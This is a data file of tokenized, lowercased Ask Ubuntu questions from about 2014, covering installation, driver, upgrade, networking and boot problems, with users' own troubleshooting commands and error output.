451415	install ubuntu 14.04 only /dev/sda showing	i 'm using the live cd to try and install ubuntu 14.04 on my old desktop . the two disks were previously part of a raid array ( of 3 disks , raid , 1 degraded and could n't be bothered rebuilding for an old windows 7 machine ) . before replying please take the following into account : 1 ) i 've tried manually removing any erroneous data using fdisk , no joy . 2 ) i used dmraid to remove any raid info , i did n't find anything . 3 ) fdisk -l found both drives , with no partitions and no errors ( both /dev/sda and /dev/sdb ) . 4 ) i 've used sudo dd if=/dev/zero of=/dev/sd* of both drives to remove the mbrs and any erroneous partion data . when i get to the installation screen and go to the manual setup section only /dev/sda is showing , /dev/sdb is no where to be seen . the drives are master and slave on the same ide channel via the sata controller .
451417	how to make my wi-fi usb adapter sitecom wla 2100 n300 v1-001 to work	i have installed ubuntu 12.04 lts on a laptop ( 32bit ) and on a desktop ( 64bit ) and on both my sitecom wifi usb adapter is not recognized by ubuntu . i dont have any experience with ubuntu or linux . on the sitecom website i only see drivers for windows but i found this information . unfortunately i dont understand where or what to do with this info : http : //www.linux-hardware-guide.com/2014-01-06-sitecom-wla-2100-usb-micro-adapter-300n-x2 is there a way to make the usb adapter work ? thanks a lot in advance !
451419	are there any decent picture editing programs in ubuntu like ifran view ?	xnviewmp could be fine but how can i instal it ? i ca n't understand the forums sort of coding . i ca n't do it .
451424	all the files created have executable permission after doing some alterations to fstab	i made the following changes in /etc/fstab , after doing this any file i create in any of the partitions has executable permission . pls help me out . this is my /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda10 during installation uuid=89e6ce75-1460-4c7e-ab26-ada11484cf4e / ext4 errors=remount-ro 0 1 # swap was on /dev/sda11 during installation uuid=fb568186-5d39-4a60-9412-c254a0489490 none swap sw 0 0 uuid=905848155847f90c /media/educational ntfs-3g defaults , auto , uid=1000 , gid=100 , dmask=027 , fmask=137 , umask=007 0 0 uuid=ceb008f2b008e337 /media/entertainment ntfs-3g defaults , auto , uid=1000 , gid=100 , dmask=027 , fmask=137 , umask=007 0 0 uuid=7216c6c016c68517 /media/projects ntfs-3g defaults , auto , uid=1000 , gid=100 , dmask=027 , fmask=137 , umask=007 0 0 and when i list my files , i see that all have executable permissions . -rwxrwx -- - 1 manu users 1213 apr 20 20:28 message_receive.c -rwxrwx -- - 1 manu users 1111 apr 19 16:02 message_send.c -rwxrwx -- - 1 manu users 1110 apr 19 16:06 message_sender1.c -rwxrwx -- - 1 manu users 1110 apr 19 16:06 message_sender2.c -rwxrwx -- - 1 manu users 1111 apr 19 16:07 message_sender3.c -rwxrwx -- - 1 manu users 7442 apr 20 20:41 receiver i want permissions like this -rw -- -- -- - 1 manu manu 1213 apr 20 20:28 message_receive.c -rw -- -- -- - 1 manu manu 1111 apr 19 16:02 message_send.c -rw -- -- -- - 1 manu manu 1110 apr 19 16:06 message_sender1.c -rw -- -- -- - 1 manu manu 1110 apr 19 16:06 message_sender2.c -rw -- -- -- - 1 manu manu 1111 apr 19 16:07 message_sender3.c -rwx -- -- -- 1 manu manu 7442 apr 20 20:41 receiver i want the above permissions what changes should i make the in the fstab ? all the above files are created in /media/projects . here all the files i create had executable permission , i do n't want that to happen only the executable files should have executable permission .
451434	ubuntu 12.04 shows packages 404 not found while updating and hash sum mismatch	i 'm getting the following error while updating : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/natty-backports/main/binary-i386/packages 404 not found w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/binary-i386/packages 404 not found w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . if i try to update from update manager it shows : failed to download repository information check your internet connection . i have absolutely no idea what to do next . please help .
451436	updating linux to 14.04 lts with no root file system	i 'm trying to update my linux notebook ( intel atom cpu n450 @ 1.66 ghz x2 ) into the newer version of ubuntu linux ( 14.04 lts 32-bit ) , but i 'm having some difficulties : first , i 'm using a usb boot pendrive , because i ca n't run linux ( without memory space , it shows a gnome energy error ) ; second , i tried to update and have chosen to not erase the disk entirely , because of the original partitions included with the computer ; third , i come to a stall because when i try to install i receive a message showing that `` the root files system is not defined . please correct this situation from the partition menu '' . do i have to erase the disk entirely or is there a way around this ? i must also show you the partitions : /dev/sda /dev/sda1 ntfs can you people help a recent newcomer to linux ! ?
451437	how to remove specified versions of package using aptitude	i have a small issue with libc6 package . there is some output : root @ xubuntu : / # aptitude versions libc6 package libc6 : p 2.17-93ubuntu4 saucy 500 h 2.18-4 100 root @ xubuntu : / # aptitude show libc6 package : libc6 state : partially installed automatically installed : no multi-arch : same version : 2.18-4 priority : required section : libs maintainer : gnu libc maintainers < debian-glibc @ lists.debian.org > architecture : amd64 uncompressed size : 10.5 m depends : libgcc1 suggests : glibc-doc , debconf | debconf-2.0 , locales conflicts : prelink ( < = 0.0.20090311-1 ) , prelink ( < = 0.0.20090311-1 ) , tzdata ( < 2007k-1 ) , tzdata ( < 2007k-1 ) , tzdata-etch , tzdata-etch breaks : hurd ( < 1:0.5.git20140203-1 ) , hurd ( < 1:0.5.git20140203-1 ) , locales ( < 2.18 ) , locales ( < 2.18 ) , locales-all ( < 2.18 ) , locales-all ( < 2.18 ) , lsb-core ( < = 3.2-27 ) , lsb-core ( < = 3.2-27 ) , nscd ( < 2.18 ) , nscd ( < 2.18 ) , libc6 ( ! = 2.18-4 ) replaces : libc6-amd64 , libc6-amd64 , libc6 ( < 2.18-4 ) provides : glibc-2.18-1 description : embedded gnu c library : shared libraries contains the standard libraries that are used by nearly all programs on the system . this package includes shared versions of the standard c library and the standard math library , as well as many others . homepage : http : //www.eglibc.org root @ xubuntu : / # aptitude reinstall libc6 the following packages will be reinstalled : libc6 libc6 : i386 0 packages upgraded , 0 newly installed , 2 reinstalled , 0 to remove and 26 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . e : i was n't able to locate a file for the libc6 package . this might mean you need to manually fix this package . e : i was n't able to locate a file for the libc6 package . this might mean you need to manually fix this package . e : internal error : could n't generate list of packages to download i suppose i need to uninstall version 2.18-4 without removing dependencies and older package version . so , how to do it ?
451442	ubuntu 13.10 : functions keys switching automatically to fn / multimedia keys on dell studio 1555	i am running ubuntu 13.10 on an old dell studio 1555 laptop . this laptop has combinend key row for multimedia keys and functions keys . you can change the behaviour on how the combined keys work via a setting in the bios . the setting in the bios can be either set to multimedia keys first , or function keys first . let me give an example . if the bios is set to function keys first , and you have firefox open , a press on f5 will reload the page , if you press the fn key while pressing f5 , you will increase the screen brightness . if the bios is set to multimedia keys first , the reverse thing happens , increase screen brightness by pressing f5 and reloading the web page by pressing fn-f5 . on this notebook i found out the following really odd but reproducable behaviour . it will ( only when ubuntu 13.10 is started , and the system is suspended at least once ) it will switch the behaviour of the function key to multimedia keys first . is there a way to stop that ? so that ubuntu will not change the bios setting ? or is there some sort of script , or hack , that will change the behaviour to function key first , while running ubuntu ? any help on that would be great , thanks a lot !
451445	why does the wifi icon not appear on the taskbar in lubuntu 14 ?	i have just updated to lubuntu 14 from version 13 . i now can not see the wifi icon on the task bar . is it meant to be there ? if so , how can i make it appear ?
451448	changing the language of date and time	i 've installed ubuntu 14.04lts on my pc and i 've selected english ( us ) as my default language and selected the time zone as my country . but the date and time in my computer on upside right showing in my country language ( not english ) . how can i change it to english ?
451453	hal not installing for use with aptoncd	i am three weeks into learning ubuntu ... i read a post that said in order to make the aptoncd load button work , i needed to install hal . i tried the following , as instructed : sudo apt-get install hal but it did not work . i am attempting to duplicate one laptop onto another using aptoncd . i have the cd 's created but am frustrated by hal . ( no , my name is not dave . ) it should be noted that the new laptop was ubuntu-ized yesterday and then updated to tahr . thanks - bill
451455	bonding interfaces not working	everytime i put in the following code ( below ) . the problem is that network devices become unmanaged . i set the managed to true . that did n't work . when i do the ifconfig it is missing the `` bond0 '' ip address information bonding mode=0 miimon=200 auto lo iface lo inet loopback auto eth2 iface eth2 inet manual bond-master bond0 auto eth3 iface eth3 inet manual bond-master bond0 auto bond0 iface bond0 inet static address 192.168.0.10 netmask 255.255.255.0 gateway 192.168.0.254 dns-nameservers 192.168.0.1 bond-mode 0 post-up ifenslave bond0 eth2 eth3 pre-down ifenslave -d bond0 eth2 eth3
451459	can not turn on wireless on ubuntu 12.04 after updating software	i have asus x55u , it was all working fine until i update software ... after updating , my wifi icon is missing , so no internet at all and bluetooth is also gone.. i am new to linux and ubuntu so pls help . i tried rfkill unblock all but thats not working ... 0 : asus-wlan : wireless lan soft blocked blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no
451463	upgrade of 12.04.4 lts to 14.04 lts fails on pandaboard	i 'm trying to upgrade 12.04.4 lts to 14.04 lts on a pandaboard . the upgrade via do-release-upgrade -dfails with fetched 0 b in 0s ( 0 b/s ) hit http : //ports.ubuntu.com trusty release.gpg hit http : //ports.ubuntu.com trusty-security release.gpg hit http : //ports.ubuntu.com trusty-updates release.gpg hit http : //ports.ubuntu.com trusty-backports release.gpg hit http : //ports.ubuntu.com trusty release hit http : //ports.ubuntu.com trusty-security release hit http : //ports.ubuntu.com trusty-updates release hit http : //ports.ubuntu.com trusty-backports release fetched 0 b in 0s ( 0 b/s ) error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/trusty/release unable to find expected entry 'main/binary-armel/packages ' in release file ( wrong sources.list entry or malformed file ) , w : failed to fetch http : //ports.ubuntu.com/ubuntu-ports/dists/trusty-security/release unable to find expected entry 'main/binary-armel/packages ' in release file ( wrong sources.list entry or malformed file ) , w : failed to fetch ... . , e : some index files failed to download . they have been ignored , or old ones used instead . hitting http : //ports.ubuntu.com/dists/trusty/ in the browser i can see that armel is indeed missing . so i 'm wondering how i can upgrade from 12.04.4 to 14.04 on that board .
451465	upgrade 13.10 to 14.04 problems	upgrade manager wo n't allow updates to 13.10 nor upgrade to 14.04 . it thinks i still have 13.04 . have 64-bit dual-boot win 8.1 / ubuntu 13.10 . the u-13.10 upgraded online from 13.04 in october . all updates run . now u/manager wants me to go from 13.04 to 13.10 first , ok i 'll play , it starts then says i have all updates , wo n't go forward . i 've tried both update/upgrade manager and command line . nothing works . about computer reports 13.10 but tell that to u/manager . i have the latest .iso but then i 'd have to re-format and i would lose my local settings/data . what to do ?
451467	can not install fragment image viewer on ubuntu 14.04	i opened software center and tried to install fragment . i clicked more info , then the buy button , logged in to ubuntu successfully . the installation never ends and nothing gets installed . when i run sudo apt-get update i get http 401 errors regarding private ppas which contain fragment . w : ... https : //private-ppa.launchpad.net/commercial-ppa-uploaders/fragment/ubuntu/dists/trusty/main/binary-amd64/packages httperror401 w : ... https : //private-ppa.launchpad.net/commercial-ppa-uploaders/fragment/ubuntu/dists/trusty/main/binary-i386/packages httperror401 i have also posted on launchpad here .
451473	ubuntu desktop with citrix receiver	is it possible to built an ubuntu desktop which would autostart the citrix receiver after boot ? the plan is for the user to see nothing other than the virtual desktop with the login screen .
451475	removing partition by reinstalling ubuntu	my laptop was running on windows xp . then i decided to try ubuntu . ( it 's fast and sleek , btw ) i chose the dual-boot option . days later , i decided to fully commit to the latter . at first , i tried to reinstall ubuntu by running the usb installer , but the action wo n't work . then , after searching for some help , i formatted the windows partition ( almost 75 % of the hdd ) . next was to expand ubuntu to the formatted partition . now here 's the complication : it ca n't , and i do n't know what to do . i 'm still trying to reinstall it , even resorted to downgrading , of no avail .
451477	ubuntu 14.04 user restarting lightdm	today , i started my computer , and when i type the password lightdm starts again instead of logging in . the same happened with gdm . now i 'm typing from computer 's guest account .
451484	no option to choose between ubuntu or windows at startup ; tried many suggestions already	yesterday i used a live cd to install ubuntu 14.04 on a computer already loaded with windows 8 . the ubuntu install did not recognize any operating system on the computer , so i chose `` something else '' and ended up with several partitions . ( if it matters , i have four windows partitions [ recovery , boot , the main one with all my files , and some other one that 's tiny so i did n't worry about it ] , plus a main ubuntu one [ / ] and a swap . ) after installing ubuntu and restarting , there has been no option to choose between ubuntu and windows at startup ; it simply starts up as windows . ubuntu is now installed but i have no way to use it ! what i need : a way to get the os selection screen on startup . what i tried : 1 ) i tried using the advanced system settings on windows to enable the boot selection , but windows 8 did n't recognize any other operating systems either . 2 ) i held down shift during startup to try and get the grub screen , but no luck . ( after a full windows 8 shutdown , not the fastboot crap . ) also , f8 , no luck . 3 ) other guides said to get boot-repair . i downloaded the image file , burned it to a cd , and tried to boot from it , but nothing happened ; windows booted normally . i booted from the live cd , opened the terminal , and ( as instructed by this guide ) sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update everything goes fine until the very end , when the last two lines back read : w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . that 404 error was talked about on this thread , so using that advice i did : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo sh -c `` sed -i 's/trusty/saucy/g ' /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list '' sudo apt-get update sudo apt-get install -y boot-repair & & boot-repair boot repair worked ( woohoo ! ) and it ran for a few seconds before a pop-up that says `` efi detected . please check the options . '' i selected to fix most frequent problems . it told me to disable secureboot in bios . it did some thinking , then told me to put this into a new terminal : sudo chroot `` /mnt/boot-sav/sdb5 '' dpkg -- configure -a sudo chroot `` /mnt/boot-sav/sdb5 '' apt-get install -fy sudo chroot `` /mnt/boot-sav/sdb5 '' apt-get purge-y -- force-yes grub* shim-signed linux-signed* i was prompted to go forward , and it said to copy-paste the following into the terminal : sudo chroot `` /mnt/boot-sav/sdb5 '' apt-get install -y -- force-yes grub-efi-amd64-signed shim-signed linux-signed-generic after going forward , it said an error occurred during the repair , and to write down this url : http : //paste.ubuntu.com/7292754 , and to email boot.repair @ gmail.com if i still have boot problems . it also reminded me to disable secureboot in bios . i disabled secureboot , but nothing had changed . windows still booted , just like before . 4 ) i booted from the live cd again and opened my grub file . sudo gedit /etc/default/grub the grub file came up , i added a # in front of grub_hidden-timeout=0 , saved , and in the terminal wrote : sudo update-grub this comes backs : /usr/sbin/grub-probe : error : failed to get canonical path of '/cow ' . and that 's as far as i 've gotten . no luck whatsoever . can someone help me figure out what i 'm doing wrong here ? many thanks , ashton
451486	putting ubuntu on a tablet without usb	i recently purchased an asus vivotab windows 8.1 tablet and , being the linux enthusiast that i am , decided to install ubuntu on it . unfortunately , there are no usb or dvd drives , so i do n't know what i 'm supposed to install ubuntu off of . i 've already tried to format a microsd like an ubuntu live usb , but i ca n't seem to get the bios to let me boot off of the microsd . any suggestions ? i just need to install ubuntu without using any kind of external drives . alternately , i 'm up for suggestions on the possibility of creating a live microsd . thanks .
451489	ubuntu 14.04 kworker hogging cpu ; fix did n't work	fresh install of ubuntu 14.04 on a touchscreen toshiba satellite laptop with intel graphics . i tried to follow the fix here : why does kworker cpu usage get so high ? it did n't work ; my problem seems to be on gpe10 , which lists as follows : /sys/firmware/acpi/interrupts/gpe10:11042017 enabled this only takes up about 32 % of one of my cpus ( there are 4 available ) , but it should n't be running that high and i want it gone . as stated , the fix above did n't work ; after reboot , nothing happened . i even tried running crontab as root , but that did nothing .
451493	can i install ubuntu without dvd , usb or doing a dual install ?	i have quite an old pc and wanted to install ubuntu to replace xp . however , the dvd drive is getting old and does not recognize any dvdrs i burn to install ubuntu . i ca n't install off usb ( even with plop ) and the only other way i have found was a dual install but that was too slow and i was told if i deleted windows , it would take ubuntu with it
451495	light alternative for unity clock applet ( netbook ) ?	default clock applet is heavy based on evolution ( i think it is provided by this package ) indicator-datetime . for this reason , on on ubu 14.04 , it is sucking about 30mb of ram ( as for htop info ) that is bit too much for a clock . is there any other alternative ? ( i just need a clock applet that display on the upper bar )
451503	14.04 not auto-mounting external drives since upgrading from 12.04	i 've upgraded from 12.04 to 14.04 via command-line when my system froze , had to do reisub and dpkg -- configure -a to recover from crash after rebooting . now everything seems to work except automatically mounting external thumb drives and external hard disk drives . after plugging in said drives , they fail to show up on the left pane and remains unmounted . i can see the device if i run lsusb and fdisk though , so it 's possibly to manually mount it but i 'd rather resolve why it 's not automatically mounting .
451504	can python 2 be safely removed from ubuntu 14.04 ?	i have updated my pc from ubuntu 13.10 to ubuntu 14.04 . i heard that ubuntu 14.04 does not include python2 , but my ubuntu 14.04 system still has python 2 installed . can i remove python 2.7.6 from my pc ? of course , i know that some software may depend on python2 .
451506	ubuntu wo n't allow to use `` / '' symbol	i 'm trying to rename directory and i need to use `` / '' symbol but ubuntu wo n't allow it . is where any way to `` cheat '' ubuntu into allowing me to use it ?
451510	manual ui scaling for non unity environments	14.04 and unity now offer ui scaling . but what if i am not running unity ? in this case i am running awesome window manager . how can i get my applications to scale the way they do when i am running unity ? in other words : is there any way to replicate this ui scaling setting in other desktop environments ? : i know i am on my own for things that are specific to my window manager , and i have solved those , but the applications do n't scale nicely the way they do in unity .
451517	guake behavior for other apps	i use and love the guake terminal emulator , so i wonder if it is possible to get the toggle behavior work for other applications . for example i want to press f11 and my current running gvim instance should pop in in a defined location ( or fullscreen ) . but it would already be helpful to switch to gvim and give it focus . i use ubuntu 12.04 . thank you in advance .
451518	should a bare bones ubuntu install through vmware fusion take up this much space ?	i am trying to clean up some space on my macbook pro and i have ubuntu running through vmware fusion . i only use ubuntu for a custom program that runs through the terminal and takes up about 5mb . using the mac os get info on the virtual machine it is telling me ubuntu takes up 31gb . is that normal ? i purged libreoffice and basically all the major apps ubuntu comes installed with . i would love to clean it up some more but do n't know where the usage is coming from . thanks
451519	host id on ubuntu 12.04.3 lts 32-bit	i would like to learn the host id of my system , how can i do so ? in accordance with the following page http : //infocenter.arm.com/help/index.jsp ? topic=/com.arm.doc.faqs/ka3651.html , i checked it by invoking the command /sbin/ifconfig eth0 however , it returned that the device was not found . when i invoked the same command without eth0 this time i got the mac address of eth1 , but according to the site aforementioned this is not a valid host id . can someone provide assistance ? thanks
451525	missing a command during running alien to convert a .rpm - .deb	i need to generate this .rpm file with alien to .deb and then i need to sudo dpkg -i the.deb file but in terminal it does not show me it has converted it . im sure its a small command that im not aware of please enlighten me
451526	removing guest session at login in ubuntu 14.04	i recently installed the ubuntu 14.04 lts it works fine but i want to remove the guest session at the login . i want to know how to remove the guest session in ubuntu 14.04 lts version . thanks in advance
451528	invisible ubuntu-sdk menu	i am planning to develop mobile programs using ubuntu-sdk , but my window manager is awesome ( http : //awesome.naquadah.org/ ) and menu of ubuntu-sdk is not visible at all . all other programs work perfectly except only one ubuntu-sdk . needed to be fixed to have normal menu like usual qt creator has .
451529	getting ubuntu to `` recognise '' wd my passport portable hard drive	done literally hours of searching but getting nowhere . i am about to take the plunge and do a clean install of the latest ubuntu and getting prepared . i have burned the latest version to disc ( i hope ) and i have backed up everything from xp onto a 1tb wd my passport . i currently have xp and the version 13 ( saucy salamander ? ) running , and i decided to see if i could easily get to my thunderbird archived emails whilst in ubuntu . i was a bit alarmed , to say the least , to find that ubuntu did n't seem to auto open , and i ca n't get to any of the files . from looking at wd 's website it seems as though my passport is n't compatible with ubuntu/linux . from forums there appears to be conflicting advice , some say `` i 've had no problems '' , others say 'not compatible , full stop '' others say `` easy , just reformat the drive ... ... . '' being a complete novice in this i 'd appreciate advice as to whether it is possible to get the thing working without getting overly techy . talk of reformatting/partitioning etc , etc scares the wotsit out of me ! treat me as an idiot works : - ) i have taken security off , as suggested in one post , and that did n't work . i 've got round about 150 gb , other than the backed up stuff from xp on the wd in total , so burning to dvd 's is n't really an option . its not so much getting the backed up files onto ubuntu as being able to watch and listen to films and music stored on it . i 've tried looking at a few manufacturers to see if anybody does do a ubuntu compatible portable but to date i 've drawn a blank . is there any other external device , not the size of a tower , that would fit the bill ? any advice would be appreciated
451530	system test memory failure message	could someone please tell me what this system report means - and what can or should i do about it - ... '' memory/info failed runtime error ( func= ( main ) , adr=17 ) : divide by zero /usr/share/checkbox/scripts/memory_compare : line 23 : -3 : substring expression < 0 '' the test was for 12.04 dual boot inside xp , asus eeepc . the system is running slowly following a reinstall . it worked fine prior to crash following 14.04 upgrade attempts .
451536	getting a pure kubuntu 14.04 installation	i 'm having the problem that i want to have a pure kubuntu installation . i used the ubuntu installer , because i had problems with the kubuntu one . when i 'm trying to remove e.g . unity-settings-daemon it wants to install gnome-settings-daemon . is there a way to remove both of them , maybe a bit like what this site does ? thanks in advance : )
451540	the screen locks as soon as i close the lid of my laptop	whenever i close the lid , there it is the computer is locked . and i do n't find any option in the power manager provided by ubuntu to turn that feature off . is there a tweak available ? there might be one .
451541	implications of excess boot options	in addition to the currently installed 12.04 , my boot menu also offers a previous version , to the best of my knowledge and ability , i have deleted all traces of previous installations prior to the latest one . are there two systems running side by side and would they interfere to the detriment of each other ? - they both appear identical , with changes in the one reflected in the other . the system runs slowly , where prior to the latest reinstall it was fast . i know how to remove the previous option from the boot menu , but i would like to get rid of the alternative os .
451542	12.04 server a little bit broken ( dpkg : error processing gconf2 / ca n't exec md5sum )	happy easter to all . i got a system a little bit broken . could any one suggest any way to try fix it ? thanks a lot for every help . here is it the detail ( after an apt-get update ) system is an ubuntu server 12.04 root @ it-jobprolin0 : ~ # sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 5 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up initramfs-tools ( 0.99ubuntu13.5 ) ... update-initramfs : deferring update ( trigger activated ) setting up gconf2 ( 3.2.5-0ubuntu2 ) ... dpkg : error processing gconf2 ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up libpam-cap ( 1:2.22-1ubuntu3 ) ... ca n't exec `` md5sum '' : no such file or directory at /usr/share/perl/5.14/ipc/open3.pm line 186 , < stdin > line 11. open2 : exec of md5sum failed at /usr/sbin/pam-auth-update line 396 dpkg : error processing libpam-cap ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up libpam-ck-connector ( 0.4.5-2ubuntu0.1 ) ... ca n't exec `` md5sum '' : no such file or directory at /usr/share/perl/5.14/ipc/open3.pm line 186 , < stdin > line 11. open2 : exec of md5sum failed at /usr/sbin/pam-auth-update line 396 dpkg : error processing libpam-ck-connector ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up libpam-gnome-keyring ( 3.2.2-2ubuntu4.1 ) ... ca n't exec `` md5sum '' : no such file or directory at /usr/share/perl/5.14/ipc/open3.pm line 186 , < stdin > line 11. open2 : exec of md5sum failed at /usr/sbin/pam-auth-update line 396 dpkg : error processing libpam-gnome-keyring ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-55-generic /usr/sbin/mkinitramfs : 183 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 183 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 183 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 183 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 183 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 183 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 243 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 253 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 306 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 329 : /usr/sbin/mkinitramfs : find : not found /usr/sbin/mkinitramfs : 6 : /usr/sbin/mkinitramfs : find : not found e : mkinitramfs failure find 127 cpio 0 gzip 0 update-initramfs : failed for /boot/initrd.img-3.2.0-55-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : gconf2 libpam-cap libpam-ck-connector libpam-gnome-keyring initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ it-jobprolin0 : ~ #
451547	ubuntu 12.04 in a 2 months old toshiba satellite	i installed ubuntu 12.04 in a 2 months old toshiba satellite c75 amd a6-5200 apu with radeon ( tm ) hd graphics ă 4 and 4gigs of ram . it does n't detect my laptop internal wireless card only my external netgear usb wireless card . every time i turn on my computer the screen is dark . in order to make it bright i have to go to setting and adjust the brightness . any advice will be appreciated .
451548	automatically different background color for each instance of gnome-terminal ?	can this setting , to have a different background color for each instance of xfce-terminal : also be made for gnome-terminal ?
451550	problems connecting to netowrk/wireless after upgrade	i just upgraded to 14.04 , completed the process and restarted my laptop . now i can not connect to my wireless network , and therefore can not connect to my internet wirelessly . ubuntu keeps trying , and failing . i have rebooted my laptop , deleted and re-entered my network information including double checking my passwords . any ideas ? thank you .
451552	can i format my kindle fire ( 1st gen ) and install ubuntu touch ?	i have an old 1st gen kindle fire that i do not use often anymore . i shattered the screen a year or so ago , and it was too expensive to fix at the time . parts are cheaper now so i ordered off amazon and plan to replace the glass . the os on those , though ... it sucks . i really do n't like any aspect of it , and want to just wipe it out . can i somehow format the disk and install something like ubuntu touch ? i 've looked around , but everything i find ends up being a lot of clicks through different forum posts to get all the necessary steps . i 'm rather new to linux and just installed ubuntu on my laptop about a month ago . i 'm still learning my way around a bit . but it would make this otherwise useless tablet 100,000x better to have a decent os that will actually give me some functionality . has anyone done this before ? will the hardware support it ?
451554	i have some questions before installing ubuntu 14.04	hello i have waited for ubuntu 14.04 release so that i wouldnt have to upgrade later . my problem is that when i try ubuntu from a usb the mouse curser is flickering , it 's very annoying . also i have heard that you should n't install ubuntu if it does n't work proparly when you try it . should i go safe and wait to install ubuntu or try another ubuntu version like xubuntu or is this normal since the os is running from the usb ? computer : asus k53sm intel core i5 2.6ghz nvidia gt630m 4gb ram
451555	unable to connect via ssh : port 22 error	i have two machines connected via the ethernet cable . one machine is running mac os x , the other ubuntu ( 13.10 ) . i am currently able to connect to the mac via ssh . however when i try login in on the ubuntu via ssh , i get the port 22 error . i can however connect to other machines from the ubuntu . i have comcast . please help . thank you in advance
451559	how to upload a file to google drive ?	i would like to just upload files to google drive from the command line . i do n't care about synchronisation . i just want to upload things to google drive and if they exist they get replaced if not they are created . i know grive exists but that syncs everything from google drive to the folder you use which is n't what i want . i was wondering if there is a solution to this , through scp or something similar ? thanks
451561	ubuntu 14.04 dual monitor	i am in the process of moving from windows xp to ubuntu 14.04 . i need to be able to run in what windows calls 'extended desktop ' . as soon as i plug in the projector or a monitor the video output jumps to the external display and shut off the built in display . i have tried adjusting the display settings and it still jumps and i ca n't get the internal display to come on until i disconnect the external device . every time i do this the settings are changed from built in display to all displays .
451567	can not ping/ssh to cirros/ubuntu instance - openstack	i have openstack havana installed i am able to launch ubuntu/cirros instance but i am not able to ping or ssh to instance and vice-versa . i had set this in local.conf host_ip=192.168.171.131 flat_interface=eth0 fixed_range=10.11.12.0/20 fixed_network_size=4096 floating_range=192.168.172.128/25 multi_host=1 what public and private network configuration are recommended ?
451568	change mouse speed and not the acceleration	i 've been searching for a good few hours on how to change the mouse speed on ubuntu 14.04 , but all the answers and tutorials i find only teach me how to adjust the acceleration and not the speed . i need to lower my mouse speed . i like a bit of acceleration , but my mouse base speed is too high which means it 's hard to aim for small buttons . how do i adjust just the mouse speed , with either xset or xinput , or other tools ? command line solutions are preferable , because i suspect the gui for mouse and touchpad settings in ubuntu 14.04 is bugged . there is n't much available to tweak besides the double click speed and laterality ( right or left-handed , see attached image ) .
451569	postgresql broken after 14.04 despite succesful pg_upgrade [ solved ]	i 'm running an ubuntu vps where i 'm am upgrading to 14.04. everything has gone smoothly so far . except the postgresql migration from 9.1 to 9.3 . the server hosts a django 1.6 site and the traceback that i get is this : file `` /srv/virtualenvs/formgiv/local/lib/python2.7/site-packages/psycopg2/__init__.py '' , line 164 , in connect conn = _connect ( dsn , connection_factory=connection_factory , async=async ) operationalerror : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? before testing this i ran these commands basically : service postgresql stop ( stops both running server versions ) su postgres /usr/lib/postgresql/9.3/bin/pg_upgrade -b /usr/lib/postgresql/9.1/bin -b /usr/lib/postgresql/9.3/bin -d /var/lib/postgresql/9.1/main/ -d /var/lib/postgresql/9.3/main/ -o `` -c config_file=/etc/postgresql/9.3/main/postgresql.conf '' -o `` -c config_file=/etc/postgresql/9.1/main/postgresql.conf '' exit service postgresql start as far as i can tell : postgresql is running and the socket-file .s.pgsql.5432 is created just as stated in the config . django is asking for the exact same file , but it can not see it . this is a standard config and was working without a hitch on ubuntu 13.10 with postgresql 9.1 the error resembles these two old posts : can not connect to postgresql on port 5432 and http : //stackoverflow.com/questions/10829464/postgresql-and-django-unix-domain-socket except i ca n't seem to get anything from following the suggestions that i already have found out . i really hope someone can spot the obvious mistake this hopefully is .
451570	application store problem	i have recently installed ubuntu , so i am kind of trying to improve on my existing knowledge ; i know application store is supposedly the central hub for downloading applications but there is a problem with it ( or with me : ) ) i searched for skype there and it returned no results , therefore i went to their official website and got the ubuntu version . even after it is installed i still can not get skype in the list of `` already installed '' software , i tried `` independent '' , `` canonical '' and also `` provided by ubuntu '' still 0 results . let 's assume i want to uninstall skype ( or any other app ) , what should i do ? thanks in advance ; )
451572	ubuntu builder alternative or replacement	does anyone know a good replacement or an alternative for the discontinued ubuntu builder ? i 've been looking for a sollution to customize a 14.04 live cd but i have n't succeded .
